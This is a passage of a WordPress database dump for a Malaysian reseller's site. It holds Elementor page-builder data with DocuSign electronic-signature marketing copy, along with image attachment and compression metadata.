device.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3cce57d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d877ca6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/keybenefits-1.png\",\"id\":2790}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"929ea92\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d6b3d6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aebc5f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/smb-keybenefits-2-2_07.png\",\"id\":2791}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"38090cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36463a9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Works with the applications, services and devices your business already uses<\\/strong> DocuSign fits right into your existing systems so you\\u2019ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e02ae5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"17fbd20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"769adff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>The reliable, globally-trusted service for electronic signatures<\\/strong><br \\/>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"55c966b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1ad9333\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/SMB.png\",\"id\":2792}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6134458\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"756a687\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"02b66c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight your customers, partners, and employees with a better way of doing business<\\/h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. It\\u2019s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.<\\/p><h3>Your company\'s digital future is here<\\/h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f819e5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d2503c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9fdd6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4698,2786,'_wp_attached_file','2019/01/product_shot_1_2.png'),(4699,2786,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:428;s:4:\"file\";s:28:\"2019/01/product_shot_1_2.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"product_shot_1_2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"product_shot_1_2-300x178.png\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"product_shot_1_2-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"product_shot_1_2-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"product_shot_1_2-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"product_shot_1_2-20x12.png\";s:5:\"width\";i:20;s:6:\"height\";i:12;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4700,2786,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.527289108789933180787556921131908893585205078125;s:5:\"bytes\";i:51149;s:11:\"size_before\";i:261936;s:10:\"size_after\";i:210787;s:4:\"time\";d:0.979999999999999982236431605997495353221893310546875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.059999999999998721023075631819665431976318359375;s:5:\"bytes\";i:2967;s:11:\"size_before\";i:14792;s:10:\"size_after\";i:11825;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:4133;s:11:\"size_before\";i:26479;s:10:\"size_after\";i:22346;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:4428;s:11:\"size_before\";i:23637;s:10:\"size_after\";i:19209;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.059999999999998721023075631819665431976318359375;s:5:\"bytes\";i:16004;s:11:\"size_before\";i:75990;s:10:\"size_after\";i:59986;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.510000000000001563194018672220408916473388671875;s:5:\"bytes\";i:23617;s:11:\"size_before\";i:121038;s:10:\"size_after\";i:97421;s:4:\"time\";d:0.4699999999999999733546474089962430298328399658203125;}}}'),(4701,2787,'_wp_attached_file','2019/01/product_shot_2_2.png'),(4702,2787,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:428;s:4:\"file\";s:28:\"2019/01/product_shot_2_2.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"product_shot_2_2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"product_shot_2_2-300x178.png\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"product_shot_2_2-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"product_shot_2_2-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"product_shot_2_2-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"product_shot_2_2-20x12.png\";s:5:\"width\";i:20;s:6:\"height\";i:12;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4703,2787,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.54057579427932722637706319801509380340576171875;s:5:\"bytes\";i:49749;s:11:\"size_before\";i:268325;s:10:\"size_after\";i:218576;s:4:\"time\";d:0.95999999999999996447286321199499070644378662109375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.870000000000000994759830064140260219573974609375;s:5:\"bytes\";i:2862;s:11:\"size_before\";i:16020;s:10:\"size_after\";i:13158;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:2683;s:11:\"size_before\";i:25630;s:10:\"size_after\";i:22947;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:3573;s:11:\"size_before\";i:20905;s:10:\"size_after\";i:17332;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.809999999999998721023075631819665431976318359375;s:5:\"bytes\";i:16646;s:11:\"size_before\";i:80001;s:10:\"size_after\";i:63355;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:23985;s:11:\"size_before\";i:125769;s:10:\"size_after\";i:101784;s:4:\"time\";d:0.520000000000000017763568394002504646778106689453125;}}}'),(4707,2788,'_elementor_template_type','post'),(4708,2788,'_elementor_data','[{\"id\":\"961215d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"554807a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c3e837\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Get to \\\"yes\\\" faster with DocuSign electronic signatures<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f69381\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f5716c9\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/sKoNwKcGKF0\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4db4450\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"174b5b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b72433e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_1_2.png\",\"id\":2786}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d831cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf24fed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign. Send. Success.<\\/h3><p>Use DocuSign to complete approvals and agreements in minutes or hours\\u2014not days\\u2014from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe44d7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca057e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d10c158\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modernize your System of Agreement<\\/h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSign\\u2019s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignature\\u00ae but also the many options of a System of Agreement Platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ee4d73\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"be54357\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_2_2.png\",\"id\":2787}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4e223a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3293733\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3cce57d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"929ea92\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d6b3d6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"38090cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e02ae5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"17fbd20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"55c966b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c090c5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"50b9d85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"10ce02f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"19ef0ffe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"11d7f34f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"14084c7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>DocuSign<\\/h2><h3>Grow your business.<br \\/>Shrink your paperwork.<\\/h3><h3>Delight customers with an easier way to do business<\\/h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collection\\u2014on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.<\\/p><h3><img class=\\\"media-element file-default\\\" src=\\\"https:\\/\\/www.docusign.com\\/sites\\/default\\/files\\/keybenefits-1.png\\\" alt=\\\"DocuSign signing experience in mobile device\\\" width=\\\"438\\\" height=\\\"212\\\" data-delta=\\\"1\\\" \\/><\\/h3><h3>Simple to implement, easy to use\\u2014customers and employees will be up and running in minutes<\\/h3><p>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature,\\u00a0collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.<\\/p><h3><img class=\\\"media-element file-default\\\" src=\\\"https:\\/\\/www.docusign.com\\/sites\\/default\\/files\\/smb-keybenefits-2-2_07.png\\\" alt=\\\"\\\" width=\\\"392\\\" height=\\\"184\\\" data-delta=\\\"1\\\" \\/><\\/h3><h3>Works with the applications, services and devices your business already uses<\\/h3><p>DocuSign fits right into your existing systems so you\\u2019ll be productive, instantly.\\u00a0Use DocuSign with over 300 popular services\\u00a0like Google, Salesforce and Box, or\\u00a0access our award-winning app\\u00a0from practically any mobile device. Works with virtually any kind of document.<\\/p><h3><img class=\\\"media-element file-default\\\" src=\\\"https:\\/\\/www.docusign.com\\/sites\\/default\\/files\\/SMB.png\\\" alt=\\\"\\\" width=\\\"460\\\" height=\\\"144\\\" data-delta=\\\"3\\\" \\/><\\/h3><h3>The reliable, globally-trusted service for electronic signatures<\\/h3><p>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.<\\/p><h2>\\u00a0<\\/h2><h3>Do more with the #1 eSignature platform for business<\\/h3><ul><li>Simple and fast setup gets you started immediately<\\/li><li>99.99% platform availability keeps your business running at all hours<\\/li><li>Flexible workflows to automate any agreement or approval process<\\/li><li>Rigorous security standards keep sensitive documents safe<\\/li><li>Instant visibility into document status and powerful reporting<\\/li><li>Full digital audit trail for easy compliance and legal enforceability<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><div><div><div><div class=\\\"row\\\"><div class=\\\"col-xs-12 col-sm-4\\\">\\u00a0<\\/div><div class=\\\"col-xs-12 col-sm-4\\\">\\u00a0<\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4710,1481,'_elementor_version','2.5.14'),(4726,2793,'_wp_page_template','template-fullwidth.php'),(4727,2793,'_elementor_edit_mode','builder'),(4728,2793,'_elementor_template_type','post'),(4729,2793,'_elementor_data','[{\"id\":\"961215d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"554807a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c3e837\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Get to \\\"yes\\\" faster with DocuSign electronic signatures<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f69381\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f5716c9\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/sKoNwKcGKF0\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4db4450\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"174b5b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b72433e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_1_2.png\",\"id\":2786}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d831cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf24fed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign. Send. Success.<\\/h3><p>Use DocuSign to complete approvals and agreements in minutes or hours\\u2014not days\\u2014from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe44d7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca057e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d10c158\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modernize your System of Agreement<\\/h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSign\\u2019s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignature\\u00ae but also the many options of a System of Agreement Platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ee4d73\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"be54357\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_2_2.png\",\"id\":2787}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b27bdc5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4901a06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d4ac2e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight customers with an easier way to do business<\\/h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collection\\u2014on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.<\\/p><p>\\u00a0<\\/p><h3>DocuSign makes your business run better<\\/h3><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4e223a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3293733\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9b77d77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Simple to implement, easy to use\\u2014customers and employees will be up and running in minutes<\\/strong><br \\/>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3cce57d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d877ca6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/keybenefits-1.png\",\"id\":2790}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"929ea92\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d6b3d6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aebc5f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/smb-keybenefits-2-2_07.png\",\"id\":2791}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"38090cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36463a9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Works with the applications, services and devices your business already uses<\\/strong><br \\/>DocuSign fits right into your existing systems so you\\u2019ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e02ae5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"17fbd20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"769adff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>The reliable, globally-trusted service for electronic signatures<\\/strong><br \\/>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"55c966b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1ad9333\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/SMB.png\",\"id\":2792}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6134458\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"756a687\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"02b66c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight your customers, partners, and employees with a better way of doing business<\\/h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. It\\u2019s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.<\\/p><h3>Your company\'s digital future is here<\\/h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c090c5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"50b9d85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"10ce02f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"19ef0ffe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"11d7f34f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"14084c7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>DocuSign<\\/h2><h3>Grow your business.<br \\/>Shrink your paperwork.<\\/h3><h3>Delight customers with an easier way to do business<\\/h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collection\\u2014on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.<\\/p><h3><img class=\\\"media-element file-default\\\" src=\\\"https:\\/\\/www.docusign.com\\/sites\\/default\\/files\\/keybenefits-1.png\\\" alt=\\\"DocuSign signing experience in mobile device\\\" width=\\\"438\\\" height=\\\"212\\\" data-delta=\\\"1\\\" \\/><\\/h3><h3>Simple to implement, easy to use\\u2014customers and employees will be up and running in minutes<\\/h3><p>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature,\\u00a0collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.<\\/p><h3><img class=\\\"media-element file-default\\\" src=\\\"https:\\/\\/www.docusign.com\\/sites\\/default\\/files\\/smb-keybenefits-2-2_07.png\\\" alt=\\\"\\\" width=\\\"392\\\" height=\\\"184\\\" data-delta=\\\"1\\\" \\/><\\/h3><h3>Works with the applications, services and devices your business already uses<\\/h3><p>DocuSign fits right into your existing systems so you\\u2019ll be productive, instantly.\\u00a0Use DocuSign with over 300 popular services\\u00a0like Google, Salesforce and Box, or\\u00a0access our award-winning app\\u00a0from practically any mobile device. Works with virtually any kind of document.<\\/p><h3><img class=\\\"media-element file-default\\\" src=\\\"https:\\/\\/www.docusign.com\\/sites\\/default\\/files\\/SMB.png\\\" 